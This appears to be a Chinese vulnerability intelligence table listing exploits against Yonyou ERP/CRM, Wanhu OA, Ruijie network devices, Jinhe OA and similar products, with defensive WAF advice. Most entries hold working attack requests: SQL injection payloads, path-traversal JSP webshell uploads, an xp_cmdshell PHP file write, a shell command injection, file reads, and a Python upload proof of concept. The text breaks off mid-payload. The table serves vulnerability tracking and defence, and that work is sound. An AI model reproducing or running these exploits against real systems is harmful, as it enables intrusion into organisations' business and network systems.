| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/yer/html/nodes/linkntb/linkntb.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1
Host:
用友U9系统DoQuery接口存在SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/U9C/CS/Office/TransWebService.asmx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEnterprise xmlns="http://tempuri.org/" />
</soap:Body>
</soap:Envelope>
POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetToken xmlns="http://tempuri.org/">
<endId>000</endId>
</GetToken>
</soap:Body>
</soap:Envelope>
POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DoQuery xmlns="http://tempuri.org/">
<token></token>
<command>select 1;waitfor delay '0:0:1' --</command>
</DoQuery>
</soap:Body>
</soap:Envelope>
用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kp/PrintZP.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1
用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kp/PrintZPFB.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+--+ HTTP/1.1
用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kp/PrintZPYG.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
Connec
用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kp/PrintZPZP.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1
用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kp/fillKP.jsp |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1
用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SSRF |
未知 |
/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Host:
{
"address":"ftlhbc.dnslog.cn"
}
用友 NC oacoSchedulerEventsSQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/portal/pt/oacoSchedulerEvents/isAgentLimit |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host:
用友 NC complainjudge 接口 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ebvp/advorappcoll/complainjudge |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /ebvp/advorappcoll/complainjudge HTTP/1.1
Host:
pageId=login&pk_complaint=11%27;WAITFOR%20DELAY%20%270:0:5%27--
用友NC ResumeModelServlet 任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
ResumeModelServlet |
等着 |
807 |
0day |
漏洞详情
未知
用友NC系统接口link存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/portal/pt/link/content |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
GET /portal/pt/link/content?pageId=login&pk_funnode=1';waitfor%20delay%20'0:0:0'--&pk_menuitem=2&pageModule=3&pageName=4 HTTP/1.1
用友 NC Cloud queryStaffByName SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ncchr/pm/staff/queryStaffByName |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1
Host:
用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp,5.1 |
/service/~iufo/com.ufida.web.action.ActionServlet |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.BusinessRefAction&method=getTaskRepTreeRef&taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
用友 NC 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/portal/pt/file/upload |
WAF封禁路路径,等待发布补丁 |
0813 |
1day |
漏洞详情
POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1
Host:
boundary=d0b7a0d40eed0e32904c8017b09eb305
--d0b7a0d40eed0e32904c8017b09eb305
<%out.print("hello world");%>
--d0b7a0d40eed0e32904c8017b09eb305--
用友畅捷通T+ FileUploadHandler+任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
用友 U8CRM 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/bgt/reservationcomplete.php |
WAF封禁路路径,等待发布补丁 |
0814 |
0day |
漏洞详情
GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
Host:
用友 U8CRM 任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/pub/help.php |
WAF封禁路路径,等待发布补丁 |
0814 |
0day |
漏洞详情
GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
Host:
用友NC接口download存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/portal/pt/psnImage/download |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ
用友NC系统FileManager接口存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/portal/pt/file/upload |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1
Host:
Content-Type: multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305
--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="file"; filename="we.jsp"
Content-Type: text/plain
<%out.print("hello world");%>
--d0b7a0d40eed0e32904c8017b09eb305--
用友U8-CRM接口exportdictionary.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/devtools/tools/exportdictionary.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012
用友U8-CRM系统接口attrlist存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/devtools/tools/attrlist.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /devtools/tools/attrlist.php?DontCheckLogin=1&isquery=1 HTTP/1.1
Host:
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded;
obj_type=1';WAITFOR DELAY '0:0:5'--
用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/bgt/reservationcomplete.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
/bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27;
用友crm客户关系管理help.php存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/pub/help.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/service/~iufo/com.ufida.web.action.ActionServlet |
WAF封禁路路径,等待发布补丁 |
0826 |
1day |
漏洞详情
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
畅捷通CRM系统newleadset.php接口存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/lead/newleadset.php |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
GET /lead/newleadset.php?gblOrgID=1+AND+(SELECT+5244+FROM+(SELECT(SLEEP(5)))HAjH)--+-&DontCheckLogin=1 HTTP/1.1
用友NC任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/uapim/upload/grouptemplet |
WAF封禁路路径,等待发布补丁 |
0830 |
nday |
漏洞详情
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
万户
万户 OA SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp |
使用WAF进行拦截 |
722 |
nday |
漏洞详情
sqlmap -u "http://xxx.com/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 -dbs
万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/defaultroot/public/iWebOfficeSign/OfficeServer.jsp |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
DBSTEP V3.0 145 0 105 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC83Yzc1QWYuanNw
<% out.println("5EA635");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1 |
使用WAF进行拦截 |
724 |
nday |
漏洞详情
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
万户ezoffice wpsservlet任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/defaultroot/platform/portal/layout/check.jsp |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
def verify(ip):
url = f'{ip}/defaultroot/platform/portal/layout/check.jsp'
headers = {
'Content-Type': 'multipart/form-data',
}
payload = '''
--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="check.jsp"
<% out.print("This website has a vulnerability!!!");%>
--55aeb894de1521afe560c924fad7c6fb--
'''
try:
response = requests.post(url, headers=headers, data=payload)
if response.status_code == 200 :
print(f"{ip}存在万户ezoffice wpsservlet任意文件上传!!!")
else:
print('漏洞不存在。')
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp |
WAF封禁路路径,等待发布补丁 |
801 |
1day |
漏洞详情
GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
万户 ezOFFICE download_ftp.jsp 任意文件下载漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件下载 |
未知 |
/defaultroot/download_ftp.jsp |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1
Host:
万户 ezoffice graph_include.jspSQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/defaultroot/platform/report/graphreport/graph_include.jsp |
WAF封禁路路径,等待发布补丁 |
809 |
0day |
漏洞详情
GET /defaultroot/platform/report/graphreport/graph_include.jsp?id=2&startDate=2022-01-01%2000:00:00.000%27%20as%20datetime)%20group%20by%20t.emp_id,t.empname%20)%20%20s%20group%20by%20empname%20order%20by%20num%20desc%20%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
万户 ezOFFICE receivefile_gd.jsp SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp |
WAF封禁路路径,等待发布补丁 |
0823 |
0day |
漏洞详情
GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=1;waitfor+delay+'0:0:5'--+ HTTP/1.1
Host:
锐捷
锐捷 RG-NBS2026G-P 交换机WEB 管理ping.htm未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/safety/ping.htm |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
/safety/ping.htm
锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/view/vpn/autovpn/online_check.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php`
锐捷EG350易网关管理系统存在信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
EG350 |
/tool/shell/nginx.conf |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/tool/shell/nginx.conf
锐捷M18000-WS-ED无线控制器存在CRL命令注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
M18000 |
/web_config.do |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /web_config.do HTTP/1.1
command=show+running-config&mode_url=exec
锐捷RG-NBS2026G-P交换机存在未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
RG-NBS2026G-P |
/system/passwdManage.htm |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/system/passwdManage.htm
锐捷-EG易网关存在RCE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cli.php |
WAF封禁路路径,等待发布补丁 |
801 |
nday |
漏洞详情
获取用户密码
POST /login.php HTTP/1.1
username=admin&password=admin?show+webmaster+user
命令执行
POST /cli.php?a=shell HTTP/1.1
notdelay=true&command=ls
锐捷-乐享智能运维管理平台getToken存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/auth-ui/v1/api/user/token/getToken |
WAF封禁路路径,等待发布补丁 |
0814 |
nday |
漏洞详情
POST /auth-ui/v1/api/user/token/getToken HTTP/1.1
account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957
锐捷-乐享智能运维管理平台getToken存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/auth-ui/v1/api/user/token/getToken |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /auth-ui/v1/api/user/token/getToken HTTP/1.1
account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957
北京筑业
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 密码重置 |
未知 |
未知 |
等着 |
722 |
1day |
漏洞详情
未知
同鑫科技
同鑫科技 EHR 系统全系列 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
未知 |
等着 |
722 |
1day |
漏洞详情
未知
同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Common/GetFlowDropDownListItems |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /Common/GetFlowDropDownListItems HTTP/1.1
FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--
金和
金和 OA C6CreateGroup 接口注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
未知 |
等着 |
722 |
1day |
漏洞详情
未知
金和OA C6 GeneralXmlhttpPage.aspx SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
未知 |
等着 |
725 |
0day |
漏洞详情
未知
金和OA jc6 clobfield SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/jc6/servlet/clobfield |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /jc6/servlet/clobfield HTTP/1.1
key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27
金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
Host:
金和OA_CarCardInfo.aspx_SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
C6 |
/c6/JHSoft.Web.Vehicle/CarCardInfo.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/ HTTP/1.1
_ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=%2FwEPDwUKMjAyNTc4NzA3NA8WAh4Ic3RyUXVlcnkFCWRlbGZsYWc9MBYCZg9kFgQCAg8PFgIeBFRleHQFBuafpeivomRkAgMPDxYMHglfUGFnZVNpemUCKB4PX1NvcnRBdHRyaWJ1dGVzMtgDAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAFFVc2VyV2ViQ29udHJvbC5EYXRhR3JpZCwgVmVyc2lvbj04LjUuNS4xMDAxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwFAQAAADlVc2VyV2ViQ29udHJvbC5EYXRhR3JpZC5EYXRhR3JpZCtTb3J0QXR0cmlidXRlc0NvbGxlY3Rpb24BAAAAEEF0dHJpYkNvbGxlY3Rpb24EOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAOFVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK1NvcnRBdHRyaWJ1dGVDb2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAAAAAAAAAAAEAUAAAAAAAAACx4MX1JlY29yZENvdW50Zh4HX2J1dHRvbjLsBAABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABRVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQsIFZlcnNpb249OC41LjUuMTAwMSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAyVXNlcldlYkNvbnRyb2wuRGF0YUdyaWQuRGF0YUdyaWQrQnV0dG9uc0NvbGxlY3Rpb24BAAAAB2J1dHRvbnMEL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAgAAAAIAAAAJAwAAAAUDAAAAL1VzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW1Db2xsZWN0aW9uAQAAABNDb2xsZWN0aW9uQmFzZStsaXN0AxxTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0AgAAAAkEAAAABAQAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdAMAAAAGX2l0ZW1zBV9zaXplCF92ZXJzaW9uBQAACAgJBQAAAAEAAAABAAAAEAUAAAAEAAAACQYAAAANAwUGAAAAJVVzZXJXZWJDb250cm9sLkRhdGFHcmlkLkRhdGFHcmlkK0l0ZW0EAAAABF9JbWcGX1RpdGxlCF9EaXNwbGF5EV9Eb3NjcmlwdGlvblRpdGxlAQEAAQECAAAABgcAAAA3Li4vSkh